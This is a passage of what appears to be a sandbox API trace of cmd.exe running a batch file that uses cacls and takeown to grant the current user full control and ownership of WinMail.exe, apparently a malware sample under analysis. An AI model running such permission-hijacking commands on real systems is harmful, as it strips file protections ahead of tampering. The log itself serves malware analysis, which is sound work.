[0232.119] GetProcessHeap () returned 0x530000 [0232.119] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x5310e8 [0232.119] GetProcessHeap () returned 0x530000 [0232.119] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb8) returned 0x531150 [0232.119] GetProcessHeap () returned 0x530000 [0232.119] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x531150, Size=0x62) returned 0x531150 [0232.119] GetProcessHeap () returned 0x530000 [0232.119] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x531150) returned 0x62 [0232.119] CmdBatNotification () returned 0x543262 [0232.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0232.120] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0232.120] _get_osfhandle (_FileHandle=3) returned 0x78 [0232.120] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.120] _get_osfhandle (_FileHandle=3) returned 0x78 [0232.120] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.120] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0xe2, lpOverlapped=0x0) returned 1 [0232.121] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0232.121] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0232.122] _get_osfhandle (_FileHandle=3) returned 0x78 [0232.122] GetFileType (hFile=0x78) returned 0x1 [0232.122] _get_osfhandle (_FileHandle=3) returned 0x78 [0232.122] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x546ac0 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x554af8 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x545810 [0232.123] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545810 | out: hHeap=0x530000) returned 1 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0232.123] GetProcessHeap () returned 0x530000 [0232.123] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546ac0 | out: hHeap=0x530000) returned 1 [0232.124] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0232.124] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0232.124] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0232.124] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0232.124] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0232.124] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0232.124] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0232.124] GetProcessHeap () returned 0x530000 [0232.124] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x5311c0 [0232.124] GetProcessHeap () returned 0x530000 [0232.124] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14) returned 0x543660 [0232.127] GetProcessHeap () returned 0x530000 [0232.127] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa2) returned 0x544160 [0232.128] _tell (_FileHandle=3) returned 32 [0232.128] _close (_FileHandle=3) returned 0 [0232.128] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0232.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.128] GetFileType (hFile=0x7) returned 0x2 [0232.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0232.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.528] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0232.529] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0232.529] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0232.529] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf050 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0232.529] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf050 | out: _Buffer=">") returned 1 [0232.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.529] GetFileType (hFile=0x7) returned 0x2 [0232.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.529] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf018 | out: lpMode=0x2cf018) returned 1 [0232.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf044, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cf044*=0x26) returned 1 [0232.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.530] GetFileType (hFile=0x7) returned 0x2 [0232.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf29c | out: lpMode=0x2cf29c) returned 1 [0232.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x543668*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf2c8, lpReserved=0x0 | out: lpBuffer=0x543668*, lpNumberOfCharsWritten=0x2cf2c8*=0x5) returned 1 [0232.531] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2d4 | out: _Buffer=" \"C:\\Program Files\\Windows Mail\\WinMail.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 77 [0232.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.531] GetFileType (hFile=0x7) returned 0x2 [0232.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0232.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x4d) returned 1 [0232.532] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf2f4 | out: _Buffer="\r\n") returned 2 [0232.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.532] GetFileType (hFile=0x7) returned 0x2 [0232.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf2b4 | out: lpMode=0x2cf2b4) returned 1 [0232.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.533] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2e0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2e0*=0x2) returned 1 [0232.533] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0232.533] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0232.534] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0232.534] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0232.534] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0232.534] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0232.534] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0232.534] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0232.534] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0232.534] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0232.534] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0232.534] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0232.534] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0232.534] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0232.534] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0232.534] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0232.534] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0232.534] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0232.534] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0232.534] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0232.534] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0232.534] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0232.534] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0232.534] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0232.534] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0232.534] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0232.534] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0232.534] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0232.534] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0232.534] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0232.534] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0232.534] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0232.534] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0232.534] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0232.535] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0232.535] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0232.535] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0232.535] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0232.535] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0232.535] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0232.535] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0232.535] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0232.535] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0232.535] GetProcessHeap () returned 0x530000 [0232.535] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x544210 [0232.535] SetErrorMode (uMode=0x0) returned 0x0 [0232.535] SetErrorMode (uMode=0x1) returned 0x0 [0232.535] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x544218, lpFilePart=0x2cf098 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf098*="Desktop") returned 0x25 [0232.535] SetErrorMode (uMode=0x0) returned 0x1 [0232.535] GetProcessHeap () returned 0x530000 [0232.535] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x544210, Size=0x60) returned 0x544210 [0232.535] GetProcessHeap () returned 0x530000 [0232.535] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544210) returned 0x60 [0232.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.536] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0232.536] GetProcessHeap () returned 0x530000 [0232.536] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x544278 [0232.536] GetProcessHeap () returned 0x530000 [0232.536] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x5443a0 [0232.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0232.539] GetLastError () returned 0x2 [0232.539] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0232.539] GetLastError () returned 0x2 [0232.539] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0x531220 [0232.540] GetProcessHeap () returned 0x530000 [0232.540] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5417e0, Size=0x4) returned 0x5417e0 [0232.540] FindClose (in: hFindFile=0x531220 | out: hFindFile=0x531220) returned 1 [0232.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0232.540] GetLastError () returned 0x2 [0232.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0x531220 [0232.540] FindClose (in: hFindFile=0x531220 | out: hFindFile=0x531220) returned 1 [0232.541] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0232.541] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0232.541] GetConsoleTitleW (in: lpConsoleTitle=0x2cee64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.541] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x544828, lpFilePart=0x2ce984 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ce984*="Desktop") returned 0x25 [0232.541] SetErrorMode (uMode=0x0) returned 0x1 [0232.541] GetProcessHeap () returned 0x530000 [0232.541] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x544820, Size=0x60) returned 0x544820 [0232.541] GetProcessHeap () returned 0x530000 [0232.541] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544820) returned 0x60 [0232.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0232.542] GetProcessHeap () returned 0x530000 [0232.542] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x544888 [0232.542] GetProcessHeap () returned 0x530000 [0232.542] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x5449b0 [0232.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.542] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0232.542] GetLastError () returned 0x2 [0232.542] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0232.543] GetLastError () returned 0x2 [0232.543] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0x531220 [0232.543] FindClose (in: hFindFile=0x531220 | out: hFindFile=0x531220) returned 1 [0232.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0232.544] GetLastError () returned 0x2 [0232.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0x531220 [0232.544] FindClose (in: hFindFile=0x531220 | out: hFindFile=0x531220) returned 1 [0232.544] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0232.544] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0232.544] GetConsoleTitleW (in: lpConsoleTitle=0x2cebf8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.544] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cea80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ceb48 | out: lpAttributeList=0x2cea80, lpSize=0x2ceb48) returned 1 [0232.544] UpdateProcThreadAttribute (in: lpAttributeList=0x2cea80, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ceb40, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cea80, lpPreviousValue=0x0) returned 1 [0232.544] GetStartupInfoW (in: lpStartupInfo=0x2cea3c | out: lpStartupInfo=0x2cea3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0232.545] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0232.546] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\WinMail.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ceadc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Mail\\WinMail.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ceb28 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\WinMail.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x2ceb28*(hProcess=0x74, hThread=0x78, dwProcessId=0xa30, dwThreadId=0x74c)) returned 1 [0232.631] CloseHandle (hObject=0x78) returned 1 [0232.631] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0232.631] GetProcessHeap () returned 0x530000 [0232.631] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545f80 | out: hHeap=0x530000) returned 1 [0232.631] GetEnvironmentStringsW () returned 0x545f80* [0232.631] GetProcessHeap () returned 0x530000 [0232.631] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb36) returned 0x546ac0 [0232.631] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0232.631] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0238.928] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2cea1c | out: lpExitCode=0x2cea1c*=0x1f57) returned 1 [0238.928] CloseHandle (hObject=0x74) returned 1 [0238.928] _vsnwprintf (in: _Buffer=0x2ceb64, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cea28 | out: _Buffer="00001F57") returned 8 [0238.928] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0238.928] GetProcessHeap () returned 0x530000 [0238.928] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546ac0 | out: hHeap=0x530000) returned 1 [0238.928] GetEnvironmentStringsW () returned 0x545f80* [0238.928] GetProcessHeap () returned 0x530000 [0238.928] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x548168 [0238.928] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0238.928] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0238.928] GetProcessHeap () returned 0x530000 [0238.928] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548168 | out: hHeap=0x530000) returned 1 [0238.928] GetEnvironmentStringsW () returned 0x545f80* [0238.928] GetProcessHeap () returned 0x530000 [0238.929] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x548168 [0238.929] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0238.929] GetProcessHeap () returned 0x530000 [0238.929] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530ce8 | out: hHeap=0x530000) returned 1 [0238.929] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cea80 | out: lpAttributeList=0x2cea80) [0238.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0238.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0238.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0238.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0238.930] SetConsoleInputExeNameW () returned 0x1 [0238.930] GetConsoleOutputCP () returned 0x1b5 [0238.930] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0238.930] SetThreadUILanguage (LangId=0x0) returned 0x409 [0238.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0238.932] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0238.932] _get_osfhandle (_FileHandle=3) returned 0x74 [0238.932] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544ae0 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5449b0 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544888 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544820 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544768 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544550 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5444d0 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5443a0 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544278 | out: hHeap=0x530000) returned 1 [0238.932] GetProcessHeap () returned 0x530000 [0238.932] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544210 | out: hHeap=0x530000) returned 1 [0238.933] GetProcessHeap () returned 0x530000 [0238.933] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544160 | out: hHeap=0x530000) returned 1 [0238.933] GetProcessHeap () returned 0x530000 [0238.933] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x543660 | out: hHeap=0x530000) returned 1 [0238.933] GetProcessHeap () returned 0x530000 [0238.933] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5311c0 | out: hHeap=0x530000) returned 1 [0238.933] _get_osfhandle (_FileHandle=3) returned 0x74 [0238.933] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0238.933] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0xc2, lpOverlapped=0x0) returned 1 [0238.934] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0238.934] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0238.935] _get_osfhandle (_FileHandle=3) returned 0x74 [0238.935] GetFileType 